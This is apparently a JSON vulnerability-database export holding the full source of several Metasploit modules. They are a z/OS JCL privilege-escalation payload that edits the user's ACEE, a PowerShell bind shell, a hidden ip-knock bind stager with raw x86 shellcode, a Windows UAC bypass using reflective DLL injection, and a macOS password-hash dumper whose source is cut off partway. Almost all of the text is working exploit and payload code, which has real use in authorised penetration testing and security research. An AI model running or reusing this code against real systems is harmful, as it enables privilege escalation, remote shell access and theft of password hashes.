{"metasploit": [{"lastseen": "2019-11-24T21:38:14", "bulletinFamily": "exploit", "description": "(Elevate privileges for user. Adds SYSTEM SPECIAL and BPX.SUPERUSER to user profile. Does this by using an unsecured/updateable APF authorized library (APFLIB) and updating the user's ACEE using this program/library. Note: This privesc only works with z/OS systems using RACF, no other ESM is supported.)\n", "modified": "2019-04-30T17:15:47", "published": "2017-04-11T19:10:33", "id": "MSF:PAYLOAD/CMD/MAINFRAME/APF_PRIVESC_JCL", "href": "", "type": "metasploit", "title": "JCL to Escalate Privileges", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n##\n# This is a JCL command payload for z/OS - mainframe.\n# It will escalate privileges of an account on the system if the user\n# can identify a writable APF authorised library \"APFLIB\"\n#\n# See https://www.ibm.com/support/knowledgecenter/zosbasics/com.ibm.zos.zsecurity/zsecc_060.htm\n# for more information on APF Authorized Libraries\n#\n# Thank you to Ayoub & The Brummie for the assembler ideas.\n#\n# To-do (BeS 4/11/17)\n# Add options for privileges that can be added.\n# Auto scan for writable APF authorized library.\n##\n\nrequire 'msf/core/handler/find_shell'\nrequire 'msf/base/sessions/mainframe_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n CachedSize = 3156\n include Msf::Payload::Single\n include Msf::Payload::Mainframe\n\n def initialize(info = {})\n super(merge_info(\n info,\n 'Name' => 'JCL to Escalate Privileges',\n 'Description' => %q{(Elevate privileges for user. Adds\n SYSTEM SPECIAL and BPX.SUPERUSER to user profile. Does this by using\n an unsecured/updateable APF authorized library (APFLIB) and updating\n the user's ACEE using this program/library. 
Note: This privesc only\n works with z/OS systems using RACF, no other ESM is supported.)},\n 'Author' =>\n [\n 'Bigendian Smalls',\n 'Ayoub'\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'mainframe',\n 'Arch' => ARCH_CMD,\n 'Handler' => Msf::Handler::None,\n 'Session' => Msf::Sessions::MainframeShell,\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'jcl',\n 'Payload' =>\n {\n 'Offsets' => {},\n 'Payload' => ''\n }\n ))\n register_options(\n [\n Opt::RPORT(21),\n OptString.new('ACTNUM', [true, \"Accounting info for JCL JOB card\", \"MSFUSER-ACCTING-INFO\"]),\n OptString.new('PGMNAME', [true, \"Programmer name for JCL JOB card\", \"programmer name\"]),\n OptString.new('JCLASS', [true, \"Job Class for JCL JOB card\", \"A\"]),\n OptString.new('NOTIFY', [false, \"Notify User for JCL JOB card\", \"\"]),\n OptString.new('MSGCLASS', [true, \"Message Class for JCL JOB card\", \"Z\"]),\n OptString.new('MSGLEVEL', [true, \"Message Level for JCL JOB card\", \"(0,0)\"]),\n OptString.new('APFLIB', [true, \"APF Authorized Library to use\", \"SYS1.LINKLIB\"])\n ],\n self.class\n )\n register_advanced_options(\n [\n OptBool.new('NTFYUSR', [true, \"Include NOTIFY Parm?\", false]),\n OptString.new('JOBNAME', [true, \"Job name for JCL JOB card\", \"DUMMY\"])\n ],\n self.class\n )\n end\n\n ##\n # Construct Payload\n ##\n def generate\n super + command_string\n end\n\n ##\n # Setup replacement vars from options if need be\n ##\n def command_string\n jcl_jobcard +\n \"//S1 EXEC ASMACLG,PARM.L='AC(1)'\\n\" \\\n \"//C.SYSLIB DD DSN=SYS1.SISTMAC1,DISP=SHR\\n\" \\\n \"// DD DSN=SYS1.MACLIB,DISP=SHR\\n\" \\\n \"//L.SYSLMOD DD DISP=SHR,DSN=#{datastore['APFLIB']}(APFPRIV)\\n\" \\\n \"//C.SYSIN DD *,DLM=ZZ\\n\" \\\n \" TITLE 'APF MISCONFIG PRIVESC FOR MSF'\\n\" \\\n \"APFPRIV CSECT\\n\" \\\n \"***********************************************************************\\n\" \\\n \"* SETUP registers and save areas *\\n\" \\\n 
\"***********************************************************************\\n\" \\\n \"MAIN STM 14,12,12(13) # Save caller reg\\n\" \\\n \" LR 8,15 # Base register\\n\" \\\n \" USING MAIN,8 # R8 for addressability\\n\" \\\n \" GETMAIN RU,LV=72 # for our savearea\\n\" \\\n \" ST 13,4(,1) # Store Caller's SA address\\n\" \\\n \" ST 1,8(,13) # Put my SA addr in caller's SA\\n\" \\\n \" LR 13,1 # R13 has addr of our SA\\n\" \\\n \" DS 0H # halfword boundaries\\n\" \\\n \"***********************************************************************\\n\" \\\n \"* MAIN PROGRAM STMTS HERE *\\n\" \\\n \"***********************************************************************\\n\" \\\n \" BAL 6,AUTHUSR # branch authuser routine\\n\" \\\n \" B EXITP # exit time\\n\" \\\n \"***********************************************************************\\n\" \\\n \"* AUTHUSER ROUTINE *\\n\" \\\n \"***********************************************************************\\n\" \\\n \"AUTHUSR MODESET KEY=ZERO,MODE=SUP # let's get into supervisor mode!\\n\" \\\n \" L 11,X'224' # R11 points to ASCB\\n\" \\\n \" L 11,X'6C'(11) # R11 points to ASXB\\n\" \\\n \" L 11,X'C8'(11) # R11 points to ACEE\\n\" \\\n \" NI X'26'(11),X'00' # Clear Byte x'26'\\n\" \\\n \" OI X'26'(11),X'B1' # Add Oper & Special to userproc\\n\" \\\n \" NI X'27'(11),X'00' # Clear Byte x'27\\n\" \\\n \" OI X'27'(11),X'80' # ALTER access to all resource\\n\" \\\n \" MODESET KEY=NZERO,MODE=PROB # back to normal\\n\" \\\n \" XR 15,15 # set rc=0 regardless\\n\" \\\n \" BR 6 # R6 has return reg\\n\" \\\n \"***********************************************************************\\n\" \\\n \"* Cleanup and exit - R15 has exit code *\\n\" \\\n \"***********************************************************************\\n\" \\\n \"EXITP LR 1,13 # Move my SA into R1\\n\" \\\n \" LR 2,15 # SAVE RC\\n\" \\\n \" L 13,4(,13) # RST Caller SA Addr\\n\" \\\n \" L 14,12(13) # Reload R14\\n\" \\\n \" FREEMAIN RU,A=(1),LV=72\\n\" \\\n \" LR 15,2 # RESTORE 
RC\\n\" \\\n \" LM 0,12,20(13) # Reload all but 14/15\\n\" \\\n \" BCR 15,14 # Branch back to caller\\n\" \\\n \" END APFPRIV # end pgm\\n\" \\\n \"ZZ\\n\" \\\n \"//S2 EXEC PGM=IKJEFT01\\n\" \\\n \"//SYSTSIN DD *\\n\" \\\n \" ALU #{datastore['FTPUSER']} SPECIAL\\n\" \\\n \" PE BPX.SUPERUSER CLASS(FACILITY) ID(#{datastore['FTPUSER']}) ACCESS(READ)\\n\" \\\n \" SETR RACL(FACILITY) REF\\n\" \\\n \"/*\\n\" \\\n \"//SYSIN DD DUMMY\\n\" \\\n \"//SYSTSPRT DD SYSOUT=*\\n\" \\\n \"//S3 EXEC PGM=IDCAMS\\n\" \\\n \"//SYSPRINT DD SYSOUT=*\\n\" \\\n \"//TEMPDD DD DSN=#{datastore['APFLIB']},DISP=SHR\\n\" \\\n \"//SYSIN DD *\\n\" \\\n \" DELETE #{datastore['APFLIB']}(APFPRIV) FILE(TEMPDD)\\n\" \\\n \"/*\\n\" \\\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/cmd/mainframe/apf_privesc_jcl.rb"}, {"lastseen": "2019-11-30T16:33:12", "bulletinFamily": "exploit", "description": "Listen for a connection and spawn an interactive powershell session\n", "modified": "2019-10-05T18:13:38", "published": "2015-06-01T15:11:23", "id": "MSF:PAYLOAD/WINDOWS/X64/POWERSHELL_BIND_TCP", "href": "", "type": "metasploit", "title": "Windows Interactive Powershell Session, Bind TCP", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/payload/windows/exec_x64'\nrequire 'msf/core/payload/windows/powershell'\nrequire 'msf/base/sessions/powershell'\nrequire 'msf/core/handler/bind_tcp'\n\n###\n#\n# Extends the Exec payload to add a new user.\n#\n###\nmodule MetasploitModule\n\n CachedSize = 1821\n\n include Msf::Payload::Windows::Exec_x64\n include Rex::Powershell::Command\n include Msf::Payload::Windows::Powershell\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Windows Interactive Powershell Session, Bind TCP',\n 'Description' => 'Listen for a connection 
and spawn an interactive powershell session',\n 'Author' =>\n [\n 'Ben Turner', # benpturner\n 'Dave Hardy' # davehardy20\n ],\n 'References' =>\n [\n ['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::BindTcp,\n 'Session' => Msf::Sessions::PowerShell,\n ))\n\n # Register command execution options\n register_options(\n [\n OptString.new('LOAD_MODULES', [ false, \"A list of powershell modules separated by a comma to download over the web\", nil ]),\n ])\n # Hide the CMD option...this is kinda ugly\n deregister_options('CMD')\n end\n\n #\n # Override the exec command string\n #\n def powershell_command\n generate_powershell_code(\"Bind\")\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/windows/x64/powershell_bind_tcp.rb"}, {"lastseen": "2019-12-01T18:24:35", "bulletinFamily": "exploit", "description": "Spawn a piped command shell (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. 
The socket will appear as \"closed,\" thus helping to hide the shellcode\n", "modified": "2017-07-24T13:26:21", "published": "2014-12-27T21:03:45", "id": "MSF:PAYLOAD/WINDOWS/SHELL/BIND_HIDDEN_IPKNOCK_TCP", "href": "", "type": "metasploit", "title": "Windows Command Shell, Hidden Bind Ipknock TCP Stager", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\n\n\nmodule MetasploitModule\n\n CachedSize = 359\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows\n\n\n def self.handler_type_alias\n \"bind_hidden_ipknock_tcp\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Hidden Bind Ipknock TCP Stager',\n 'Description' => 'Listen for a connection. First, the port will need to be knocked from\n the IP defined in KHOST. This IP will work as an authentication method\n (you can spoof it with tools like hping). After that you could get your\n shellcode from any IP. 
The socket will appear as \"closed,\" thus helping to\n hide the shellcode',\n 'Author' =>\n [\n 'hdm', # original payload module (stager bind_tcp)\n 'skape', # original payload module (stager bind_tcp)\n 'sf', # original payload module (stager bind_tcp)\n 'Borja Merino <bmerinofe[at]gmail.com>' # Add Hidden Ipknock functionality\n ],\n 'License' => MSF_LICENSE,\n 'References' => ['URL', 'http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html'],\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::BindTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n {\n 'RequiresMidstager' => false,\n 'Offsets' =>\n {\n 'LPORT' => [ 193, 'n' ],\n 'KHOST' => [ 255, 'ADDR' ]\n },\n 'Payload' =>\n # Length: 359 bytes\n \"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\\x50\\x30\\x8b\" +\n \"\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\\xac\\x3c\" +\n \"\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\" +\n \"\\x10\\x8b\\x4a\\x3c\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\" +\n \"\\x01\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\\xff\\xac\" +\n \"\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\\xf8\\x3b\\x7d\\x24\\x75\" +\n \"\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\" +\n \"\\x8b\\x04\\x8b\\x01\\xd0\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\" +\n \"\\xe0\\x5f\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x68\\x33\\x32\\x00\\x00\\x68\\x77\" +\n \"\\x73\\x32\\x5f\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\xb8\\x90\\x01\\x00\\x00\" +\n \"\\x29\\xc4\\x54\\x50\\x68\\x29\\x80\\x6b\\x00\\xff\\xd5\\x50\\x50\\x50\\x50\\x40\" +\n \"\\x50\\x40\\x50\\x68\\xea\\x0f\\xdf\\xe0\\xff\\xd5\\x97\\x31\\xdb\\x53\\x68\\x02\" +\n \"\\x00\\x11\\x5c\\x89\\xe6\\x6a\\x10\\x56\\x57\\x68\\xc2\\xdb\\x37\\x67\\xff\\xd5\" +\n \"\\x6a\\x01\\x54\\x68\\x02\\x30\\x00\\x00\\x68\\xff\\xff\\x00\\x00\\x57\\x68\\xf1\" +\n 
\"\\xa2\\x77\\x29\\xff\\xd5\\x53\\x57\\x68\\xb7\\xe9\\x38\\xff\\xff\\xd5\\x53\\xe8\" +\n \"\\x1a\\x00\\x00\\x00\\x8b\\x44\\x24\\x04\\x8b\\x40\\x04\\x8b\\x40\\x04\\x2d\\xc0\" +\n \"\\xa8\\x01\\x21\\x74\\x03\\x31\\xc0\\x40\\x89\\x45\\x54\\xc2\\x20\\x00\\x53\\x53\" +\n \"\\x57\\x68\\x94\\xac\\xbe\\x33\\xff\\xd5\\x83\\x7c\\x24\\x04\\x00\\x75\\xcf\\x40\" +\n \"\\x75\\x06\\x53\\x53\\xeb\\xe8\\x74\\xc6\\x48\\x57\\x97\\x68\\x75\\x6e\\x4d\\x61\" +\n \"\\xff\\xd5\\x6a\\x00\\x6a\\x04\\x56\\x57\\x68\\x02\\xd9\\xc8\\x5f\\xff\\xd5\\x8b\" +\n \"\\x36\\x6a\\x40\\x68\\x00\\x10\\x00\\x00\\x56\\x6a\\x00\\x68\\x58\\xa4\\x53\\xe5\" +\n \"\\xff\\xd5\\x93\\x53\\x6a\\x00\\x56\\x53\\x57\\x68\\x02\\xd9\\xc8\\x5f\\xff\\xd5\" +\n \"\\x01\\xc3\\x29\\xc6\\x75\\xee\\xc3\"\n }\n ))\n\n register_options([\n OptAddress.new('KHOST', [true, \"IP address allowed\", nil])\n ])\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb"}, {"lastseen": "2019-11-22T16:57:25", "bulletinFamily": "exploit", "description": "This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of three separate binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also). 
If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.\n", "modified": "2019-09-08T04:42:21", "published": "2013-09-27T08:10:49", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/BYPASSUAC_INJECTION", "href": "", "type": "metasploit", "title": "Windows Escalate UAC Protection Bypass (In Memory Injection)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/exe'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Exploit::EXE\n include Exploit::FileDropper\n include Post::File\n include Post::Windows::Priv\n include Post::Windows::ReflectiveDLLInjection\n include Post::Windows::Runas\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Windows Escalate UAC Protection Bypass (In Memory Injection)',\n 'Description' => %q{\n This module will bypass Windows UAC by utilizing the trusted publisher\n certificate through process injection. It will spawn a second shell that\n has the UAC flag turned off. This module uses the Reflective DLL Injection\n technique to drop only the DLL payload binary instead of three separate\n binaries in the standard technique. 
However, it requires the correct\n architecture to be selected, (use x64 for SYSWOW64 systems also).\n If specifying EXE::Custom your DLL should call ExitProcess() after starting\n your payload in a separate process.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'David Kennedy \"ReL1K\" <kennedyd013[at]gmail.com>',\n 'mitnick',\n 'mubix', # Port to local exploit\n 'Ben Campbell', # In memory technique\n 'Lesage', # Win8+ updates\n 'OJ Reeves' # Win 8+ updates\n ],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ],\n 'Targets' => [\n [ 'Windows x86', { 'Arch' => ARCH_X86 } ],\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'DefaultTarget' => 0,\n 'References' =>\n [\n ['URL', 'http://www.trustedsec.com/december-2010/bypass-windows-uac/'],\n ['URL', 'http://www.pretentiousname.com/misc/W7E_Source/win7_uac_poc_details.html']\n ],\n 'DisclosureDate'=> 'Dec 31 2010'\n ))\n\n end\n\n def exploit\n # Validate that we can actually do things before we bother\n # doing any more work\n validate_environment!\n check_permissions!\n\n # get all required environment variables in one shot instead. This\n # is a better approach because we don't constantly make calls through\n # the session to get the variables.\n env_vars = get_envs('TEMP', 'WINDIR')\n\n case get_uac_level\n when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,\n UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,\n UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT\n fail_with(Failure::NotVulnerable,\n \"UAC is set to 'Always Notify'. 
This module does not bypass this setting, exiting...\"\n )\n when UAC_DEFAULT\n print_good('UAC is set to Default')\n print_good('BypassUAC can bypass this setting, continuing...')\n when UAC_NO_PROMPT\n print_warning('UAC set to DoNotPrompt - using ShellExecute \"runas\" method instead')\n shell_execute_exe\n return\n end\n\n dll_path = bypass_dll_path\n payload_filepath = \"#{env_vars['TEMP']}\\\\#{rand_text_alpha(8)}.dll\"\n\n upload_payload_dll(payload_filepath)\n\n pid = spawn_inject_proc(env_vars['WINDIR'])\n\n file_paths = get_file_paths(env_vars['WINDIR'], payload_filepath)\n run_injection(pid, dll_path, file_paths)\n\n # Windows 7 this is cleared up by DLL but on Windows\n # 8.1 it fails to delete the the file.\n register_file_for_cleanup(file_paths[:szElevDllFull])\n end\n\n def bypass_dll_path\n # path to the bypassuac binary\n path = ::File.join(Msf::Config.data_directory, 'post')\n\n sysarch = sysinfo['Architecture']\n if sysarch == ARCH_X64\n unless (target_arch.first =~ /64/i) && (payload_instance.arch.first =~ /64/i)\n fail_with(Failure::BadConfig, 'x86 Target Selected for x64 System')\n end\n else\n if (target_arch.first =~ /64/i) || (payload_instance.arch.first =~ /64/i)\n fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')\n end\n end\n\n ::File.join(path, \"bypassuac-#{sysarch}.dll\")\n end\n\n def check_permissions!\n # Check if you are an admin\n vprint_status('Checking admin status...')\n admin_group = is_in_admin_group?\n\n if admin_group.nil?\n print_error('Either whoami is not there or failed to execute')\n print_error('Continuing under assumption you already checked...')\n else\n if admin_group\n print_good('Part of Administrators group! 
Continuing...')\n else\n fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')\n end\n end\n\n if get_integrity_level == INTEGRITY_LEVEL_SID[:low]\n fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')\n end\n end\n\n def run_injection(pid, dll_path, file_paths)\n vprint_status(\"Injecting #{datastore['DLL_PATH']} into process ID #{pid}\")\n begin\n path_struct = create_struct(file_paths)\n\n vprint_status(\"Opening process #{pid}\")\n host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)\n exploit_mem, offset = inject_dll_into_process(host_process, dll_path)\n\n vprint_status(\"Injecting struct into #{pid}\")\n struct_addr = host_process.memory.allocate(path_struct.length)\n host_process.memory.write(struct_addr, path_struct)\n\n vprint_status('Executing payload')\n thread = host_process.thread.create(exploit_mem + offset, struct_addr)\n print_good(\"Successfully injected payload in to process: #{pid}\")\n client.railgun.kernel32.WaitForSingleObject(thread.handle, 14000)\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Failed to Inject Payload to #{pid}!\")\n vprint_error(e.to_s)\n end\n end\n\n # Create a process in the native architecture\n def spawn_inject_proc(win_dir)\n print_status('Spawning process with Windows Publisher Certificate, to inject into...')\n if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86\n cmd = \"#{win_dir}\\\\sysnative\\\\notepad.exe\"\n else\n cmd = \"#{win_dir}\\\\System32\\\\notepad.exe\"\n end\n pid = cmd_exec_get_pid(cmd)\n\n unless pid\n fail_with(Failure::Unknown, 'Spawning Process failed...')\n end\n\n pid\n end\n\n def upload_payload_dll(payload_filepath)\n payload = generate_payload_dll({:dll_exitprocess => true})\n print_status('Uploading the Payload DLL to the filesystem...')\n begin\n vprint_status(\"Payload DLL #{payload.length} bytes long being uploaded..\")\n write_file(payload_filepath, payload)\n 
register_file_for_cleanup(payload_filepath)\n rescue Rex::Post::Meterpreter::RequestError => e\n fail_with(Failure::Unknown, \"Error uploading file #{payload_filepath}: #{e.class} #{e}\")\n end\n end\n\n def validate_environment!\n fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?\n\n winver = sysinfo['OS']\n\n case winver\n when /Windows (7|8|2008|2012|10)/\n print_good(\"#{winver} may be vulnerable.\")\n else\n fail_with(Failure::NotVulnerable, \"#{winver} is not vulnerable.\")\n end\n\n if is_uac_enabled?\n print_status('UAC is Enabled, checking level...')\n else\n unless is_in_admin_group?\n fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')\n end\n end\n end\n\n def get_file_paths(win_path, payload_filepath)\n paths = {}\n\n case sysinfo['OS']\n when /Windows (7|2008)/\n paths[:szElevDll] = 'CRYPTBASE.dll'\n paths[:szElevDir] = \"#{win_path}\\\\System32\\\\sysprep\"\n paths[:szElevDirSysWow64] = \"#{win_path}\\\\sysnative\\\\sysprep\"\n paths[:szElevExeFull] = \"#{paths[:szElevDir]}\\\\sysprep.exe\"\n when /Windows (8|2012|10)/\n paths[:szElevDll] = 'NTWDBLIB.dll'\n paths[:szElevDir] = \"#{win_path}\\\\System32\"\n # This should be fine to be left blank\n paths[:szElevDirSysWow64] = ''\n paths[:szElevExeFull] = \"#{paths[:szElevDir]}\\\\cliconfg.exe\"\n end\n\n paths[:szElevDllFull] = \"#{paths[:szElevDir]}\\\\#{paths[:szElevDll]}\"\n paths[:szTempDllPath] = payload_filepath\n\n paths\n end\n\n # Creates the paths struct which contains all the required paths\n # the dll needs to copy/execute etc.\n def create_struct(paths)\n\n # write each path to the structure in the order they\n # are defined in the bypass uac binary.\n struct = ''\n struct << fill_struct_path(paths[:szElevDir])\n struct << fill_struct_path(paths[:szElevDirSysWow64])\n struct << fill_struct_path(paths[:szElevDll])\n struct << fill_struct_path(paths[:szElevDllFull])\n struct << fill_struct_path(paths[:szElevExeFull])\n struct 
<< fill_struct_path(paths[:szTempDllPath])\n\n struct\n end\n\n def fill_struct_path(path)\n path = Rex::Text.to_unicode(path)\n path + \"\\x00\" * (520 - path.length)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/bypassuac_injection.rb"}, {"lastseen": "2019-10-24T14:42:21", "bulletinFamily": "exploit", "description": "This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports versions 10.3 to 10.14.\n", "modified": "2019-05-30T22:33:45", "published": "2012-10-23T18:24:05", "id": "MSF:POST/OSX/GATHER/HASHDUMP", "href": "", "type": "metasploit", "title": "OS X Gather Mac OS X Password Hash Collector", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\nrequire 'rexml/document'\n\nclass MetasploitModule < Msf::Post\n # set of accounts to ignore while pilfering data\n #OSX_IGNORE_ACCOUNTS = [\"Shared\", \".localized\"]\n\n include Msf::Post::File\n include Msf::Post::OSX::Priv\n include Msf::Post::OSX::System\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'OS X Gather Mac OS X Password Hash Collector',\n 'Description' => %q{\n This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. 
Supports\n versions 10.3 to 10.14.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Carlos Perez <carlos_perez[at]darkoperator.com>',\n 'hammackj <jacob.hammack[at]hammackj.com>',\n 'joev'\n ],\n 'Platform' => [ 'osx' ],\n 'SessionTypes' => [ 'shell' ]\n ))\n register_options([\n OptRegexp.new('MATCHUSER', [false,\n 'Only attempt to grab hashes for users whose name matches this regex'\n ])\n ])\n end\n\n # Run Method for when run command is issued\n def run\n unless is_root?\n fail_with(Failure::BadConfig, 'Insufficient Privileges: must be running as root to dump the hashes')\n end\n\n # iterate over all users\n get_nonsystem_accounts.each do |user_info|\n user = user_info['name']\n next if datastore['MATCHUSER'].present? and datastore['MATCHUSER'] !~ user\n print_status \"Attempting to grab shadow for user #{user}...\"\n if gt_lion? # 10.8+\n # pull the shadow from dscl\n shadow_bytes = grab_shadow_blob(user)\n next if shadow_bytes.blank?\n\n # on 10.8+ ShadowHashData stores a binary plist inside of the user.plist\n # Here we pull out the binary plist bytes and use built-in plutil to convert to xml\n plist_bytes = shadow_bytes.split('').each_slice(2).map{|s| \"\\\\x#{s[0]}#{s[1]}\"}.join\n\n # encode the bytes as \\x hex string, print using bash's echo, and pass to plutil\n shadow_plist = cmd_exec(\"/bin/bash -c 'echo -ne \\\"#{plist_bytes}\\\" | plutil -convert xml1 - -o -'\")\n\n # read the plaintext xml\n shadow_xml = REXML::Document.new(shadow_plist)\n\n # parse out the different parts of sha512pbkdf2\n dict = shadow_xml.elements[1].elements[1].elements[2]\n entropy = Rex::Text.to_hex(dict.elements[2].text.gsub(/\\s+/, '').unpack('m*')[0], '')\n iterations = dict.elements[4].text.gsub(/\\s+/, '')\n salt = Rex::Text.to_hex(dict.elements[6].text.gsub(/\\s+/, '').unpack('m*')[0], '')\n\n # PBKDF2 stored in <iterations, salt, entropy> format\n decoded_hash = \"$ml$#{iterations}$#{salt}$#{entropy}\"\n report_hash(\"SHA-512 PBKDF2\", decoded_hash, user)\n elsif 
lion? # 10.7\n # pull the shadow from dscl\n shadow_bytes = grab_shadow_blob(user)\n next if shadow_bytes.blank?\n\n # on 10.7 the ShadowHashData is stored in plaintext\n hash_decoded = shadow_bytes.downcase\n\n # Check if NT HASH is present\n if hash_decoded =~ /4f1010/\n report_hash(\"NT\", hash_decoded.scan(/^\\w*4f1010(\\w*)4f1044/)[0][0], user)\n end\n\n # slice out the sha512 hash + salt\n # original regex left for historical purposes. During testing it was discovered that\n # 4f110200 was also a valid end. Instead of looking for the end, since its a hash (known\n # length) we can just set the length\n #sha512 = hash_decoded.scan(/^\\w*4f1044(\\w*)(080b190|080d101e31)/)[0][0]\n sha512 = hash_decoded.scan(/^\\w*4f1044(\\w{136})/)[0][0]\n report_hash(\"SHA-512\", sha512, user)\n else # 10.6 and below\n # On 10.6 and below, SHA-1 is used for encryption\n guid = if gte_leopard?\n cmd_exec(\"/usr/bin/dscl localhost -read /Search/Users/#{user} | grep GeneratedUID | cut -c15-\").chomp\n elsif lte_tiger?\n cmd_exec(\"/usr/bin/niutil -readprop . 
/users/#{user} generateduid\").chomp\n end\n\n # Extract the hashes\n sha1_hash = cmd_exec(\"cat /var/db/shadow/hash/#{guid} | cut -c169-216\").chomp\n nt_hash = cmd_exec(\"cat /var/db/shadow/hash/#{guid} | cut -c1-32\").chomp\n lm_hash = cmd_exec(\"cat /var/db/shadow/hash/#{guid} | cut -c33-64\").chomp\n\n # Check that we have the hashes and save them\n if sha1_hash !~ /0000000000000000000000000/\n report_hash(\"SHA-1\", sha1_hash, user)\n end\n if nt_hash !~ /000000000000000/\n report_hash(\"NT\", nt_hash, user)\n end\n if lm_hash !~ /0000000000000/\n report_hash(\"LM\", lm_hash, user)\n end\n end\n end\n end\n\n private\n\n # @return [Bool] system version is at least 10.5\n def gte_leopard?\n ver_num =~ /10\\.(\\d+)/ and $1.to_i >= 5\n end\n\n # @return [Bool] system version is at least 10.8\n def gt_lion?\n ver_num =~ /10\\.(\\d+)/ and $1.to_i >= 8\n end\n\n # @return [String] hostname\n def host\n session.session_host\n end\n\n # @return [Bool] system version is 10.7\n def lion?\n ver_num =~ /10\\.(\\d+)/ and $1.to_i == 7\n end\n\n # @return [Bool] system version is 10.4 or lower\n def lte_tiger?\n ver_num =~ /10\\.(\\d+)/ and $1.to_i <= 4\n end\n\n # parse the dslocal plist in lion\n def read_ds_xml_plist(plist_content)\n doc = REXML::Document.new(plist_content)\n keys = []\n doc.elements.each(\"plist/dict/key\") { |n| keys << n.text }\n\n fields = {}\n i = 0\n doc.elements.each(\"plist/dict/array\") do |element|\n data = []\n fields[keys[i]] = data\n element.each_element(\"*\") do |thing|\n data_set = thing.text\n if data_set\n data << data_set.gsub(\"\\n\\t\\t\",\"\")\n else\n data << data_set\n end\n end\n i+=1\n end\n return fields\n end\n\n # reports the hash info to metasploit backend\n def report_hash(type, hash, user)\n return unless hash.present?\n print_good(\"#{type}:#{user}:#{hash}\")\n case type\n when \"NT\"\n private_data = \"#{Metasploit::Credential::NTLMHash::BLANK_LM_HASH}:#{hash}\"\n private_type = :ntlm_hash\n jtr_format = 'ntlm'\n when 
